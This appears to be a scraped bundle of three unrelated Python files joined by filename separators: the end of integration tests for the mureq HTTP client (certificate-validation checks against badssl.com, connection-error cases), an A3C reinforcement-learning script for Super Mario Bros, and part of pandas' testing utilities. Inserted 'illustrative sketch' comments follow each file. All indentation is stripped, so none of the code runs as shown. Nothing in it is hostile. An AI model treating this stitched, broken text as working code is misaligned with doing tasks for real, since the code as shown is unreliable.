5Sj9MAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBCwUAA4IC
AQBQU9U8+jTRT6H9AIFm6y50tXTg/ySxRNmeP1Ey9Zf4jUE6yr3Q8xBv9gTFLiY1
qW2qfkDSmXVdBkl/OU3+xb5QOG5hW7wVolWQyKREV5EvUZXZxoH7LVEMdkCsRJDK
wYEKnEErFls5WPXY3bOglBOQqAIiuLQ0f77a2HXULDdQTn5SueW/vrA4RJEKuWxU
iD9XPnVZ9tPtky2Du7wcL9qhgTddpS/NgAuLO4PXh2TQ0EMCll5reZ5AEr0NSLDF
c/koDv/EZqB7VYhcPzr1bhQgbv1dl9NZU0dWKIMkRE/T7vZ97I3aPZqIapC2ulrf
KrlqjXidwrGFg8xbiGYQHPx3tHPZxoM5WG2voI6G3s1/iD+B4V6lUEvivd3f6tq7
d1V/3q1sL5DNv7TvaKGsq8g5un0TAkqaewJQ5fXLigF/yYu5a24/GUD783MdAPFv
gWz8F81evOyRfpf9CAqIswMF+T6Dwv3aw5L9hSniMrblkg+ai0K22JfoBcGOzMtB
Ke/Ps2Za56dTRoY/a4r62hrcGxufXd0mTdPaJLw3sJeHYjLxVAYWQq4QKJQWDgTS
dAEWyN2WXaBFPx5c8KIW95Eu8ShWE00VVC3oA4emoZ2nrzBXLrUScifY6VaYYkkR
2O2tSqU8Ri3XRdgpNPDWp8ZL49KhYGYo3R/k98gnMHiY5g==
-----END CERTIFICATE-----
"""
class MureqIntegrationBadSSLTestCase(unittest.TestCase):
def test_ssl(self):
self._check_bad_ssl('https://expired.badssl.com/')
self._check_bad_ssl('https://wrong.host.badssl.com/')
self._check_bad_ssl('https://self-signed.badssl.com/')
self._check_bad_ssl('https://untrusted-root.badssl.com/')
# whether this is detectable will depend on the age of the ca-certificates
# package. Python doesn't have OCSP support: https://bugs.python.org/issue17123
#self._check_bad_ssl('https://revoked.badssl.com/')
#self._check_bad_ssl('https://pinning-test.badssl.com/')
def _check_bad_ssl(self, badurl):
# validation should fail with default arguments
with self.assertRaises(mureq.HTTPException):
response = mureq.get(badurl)
# and succeed with verify=False
response = mureq.get(badurl, verify=False)
self.assertEqual(response.status_code, 200)
def test_ssl_context(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(cadata=BADSSL_ROOT)
response = mureq.get("https://untrusted-root.badssl.com", ssl_context=context)
self.assertEqual(response.status_code, 200)
with self.assertRaises(mureq.HTTPException):
mureq.get("https://httpbingo.org", ssl_context=context)
class MureqIntegrationExceptionTestCase(unittest.TestCase):
def _check_raises(self, url):
with self.assertRaises(mureq.HTTPException):
mureq.get(url, timeout=0.25)
def test_exceptions(self):
# all of these should raise a normal HTTPException
self._check_raises('http://127.0.0.1:48373')
self._check_raises('http://192.168.22.122:48373')
self._check_raises('http://10.32.34.58:48373')
self._check_raises('http://[fe80::fc54:ff:fe94:ed50]:48373')
self._check_raises('http://%2Ftmp%2Fnonexistent_mureq_sock/')
# NXDOMAIN:
self._check_raises('http://mureq.test')
# blackhole (currently):
self._check_raises('http://8.8.8.8')
# refuses connections on port 80 (currently):
self._check_raises('http://files.stronghold.network')
with self.assertRaises(mureq.HTTPException):
mureq.get('http://localhost/', unix_socket='/tmp/nonexistent_mureq_sock')
def _resolve_name(hostname, desired_family=socket.AF_INET6):
for (family, type_, proto, canonname, sockaddr) in socket.getaddrinfo(hostname, None):
if family == desired_family:
return sockaddr[0]
raise ValueError("couldn't resolve", family, hostname)
class MureqIntegrationIPAddressURLTestCase(unittest.TestCase):
# TODO : i think this relies on example.com presenting a certificate without
# requiring SNI. if you substitute httpbingo.org you get:
# ssl.SSLError: [SSL: TLSV1_ALERT_ACCESS_DENIED] tlsv1 alert access denied (_ssl.c:1131)
def test_ipv6_url(self):
addr = _resolve_name('example.com', socket.AF_INET6)
# ipv6 address must be in brackets
http_url = 'http://[%s]/' % (addr,)
http_url_port = 'http://[%s]:80/' % (addr,)
https_url = 'https://[%s]/' % (addr,)
https_url_port = 'https://[%s]:443/' % (addr,)
headers = {'Host': 'example.com'}
self.assertEqual(mureq.get(http_url, headers=headers).status_code, 200)
self.assertEqual(mureq.get(http_url_port, headers=headers).status_code, 200)
self.assertEqual(mureq.get(https_url, headers=headers, verify=False).status_code, 200)
self.assertEqual(mureq.get(https_url_port, headers=headers, verify=False).status_code, 200)
def test_ipv4_url(self):
addr = _resolve_name('example.com', socket.AF_INET)
http_url = 'http://%s/' % (addr,)
http_url_port = 'http://%s:80/' % (addr,)
https_url = 'https://%s/' % (addr,)
https_url_port = 'https://%s:443/' % (addr,)
headers = {'Host': 'example.com'}
self.assertEqual(mureq.get(http_url, headers=headers).status_code, 200)
self.assertEqual(mureq.get(http_url_port, headers=headers).status_code, 200)
self.assertEqual(mureq.get(https_url, headers=headers, verify=False).status_code, 200)
self.assertEqual(mureq.get(https_url_port, headers=headers, verify=False).status_code, 200)
if __name__ == '__main__':
unittest.main() # pragma: no cover
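# --- Illustrative sketch (not part of the test suite) ----------------------
# The unix-socket tests above encode the socket path with quote(..., safe='')
# so every '/' becomes %2F and the whole path can sit in the authority part
# of an http+unix:// URL. A standalone helper showing just that convention:
def _sketch_unix_url(socket_path, request_path='/'):
    import urllib.parse
    return 'http+unix://%s%s' % (urllib.parse.quote(socket_path, safe=''), request_path)
# Example: _sketch_unix_url('/tmp/app.sock', '/bar/baz')
#   -> 'http+unix://%2Ftmp%2Fapp.sock/bar/baz'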
|
train_tiles.py
|
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os # NOQA: E402
os.environ["CUDA_VISIBLE_DEVICES"] = "3" # NOQA: E402
import argparse
import torch
from src.env import create_train_env
from src.model_tiles import ActorCritic
from src.optimizer import GlobalAdam
from src.process_tiles import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def get_args():
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for
Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=1)
parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros_tiles")
parser.add_argument("--saved_path", type=str, default="trained_models_tiles")
parser.add_argument("--load_from_previous_stage", type=bool, default=True,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
global_model = ActorCritic(1, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_from_previous_stage:
if opt.stage == 1:
previous_world = opt.world - 1
previous_stage = 4
else:
previous_world = opt.world
previous_stage = opt.stage - 1
file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
if os.path.isfile(file_):
global_model.load_state_dict(torch.load(file_))
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
local_train(0, opt, global_model, optimizer, True)
local_test(opt.num_processes, opt, global_model)
# processes = []
#
# for index in range(opt.num_processes):
# if index == 0:
# process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
# else:
# process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
# process.start()
# processes.append(process)
#
# process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
# process.start()
# processes.append(process)
# for process in processes:
# process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
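# --- Illustrative sketch (not part of train_tiles.py) ----------------------
# train() above warm-starts from the previous stage's checkpoint: stage 1
# falls back to stage 4 of the previous world, otherwise only the stage is
# decremented. The same lookup as a small pure function:
def _sketch_previous_checkpoint(world, stage, saved_path="trained_models_tiles"):
    if stage == 1:
        previous_world, previous_stage = world - 1, 4
    else:
        previous_world, previous_stage = world, stage - 1
    return "{}/a3c_super_mario_bros_{}_{}".format(saved_path, previous_world, previous_stage)
# Example: world 2, stage 1 -> "trained_models_tiles/a3c_super_mario_bros_1_4".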
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import (
Any,
Callable,
ContextManager,
List,
Optional,
Tuple,
Type,
Union,
cast,
)
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
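# --- Illustrative usage (not part of pandas) --------------------------------
# decompress_file() above yields a binary file object for any of the
# supported compression schemes, so callers read transparently. The path and
# compression below are placeholders, not names used elsewhere in this file.
def _sketch_read_compressed(path="data.csv.gz", compression="gzip"):
    with decompress_file(path, compression) as handle:
        return handle.read()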
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
args: Tuple[Any, ...] = (data,)
mode = "wb"
method = "write"
compress_method: Callable
if compression == "zip":
compress_method = zipfile.ZipFile
mode = "w"
args = (dest, data)
method = "writestr"
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
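# --- Illustrative usage (not part of pandas) --------------------------------
# assert_almost_equal() above dispatches on the input type and compares
# within rtol/atol; for example, two Series differing only far below the
# default relative tolerance of 1e-5 compare as equal:
def _sketch_assert_almost_equal():
    assert_almost_equal(pd.Series([1.0, 2.0]), pd.Series([1.0, 2.0 + 1e-9]))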
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agree to remove it on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_index_equal
>>> a = pd.Index([1, 2, 3])
>>> b = pd.Index([1, 2, 3])
>>> assert_index_equal(a, b)
"""
__tracebackhide__ = True
def _check_types(left, right, obj="Index"):
if exact:
assert_class_equal(left, right, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", left, right, obj=obj)
# allow string-like to have different inferred_types
if left.inferred_type in ("string",):
assert right.inferred_type in ("string",)
else:
assert_attr_equal("inferred_type", left, right, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = (
np.sum((left._values != right._values).astype(int)) * 100.0 / len(left)
)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
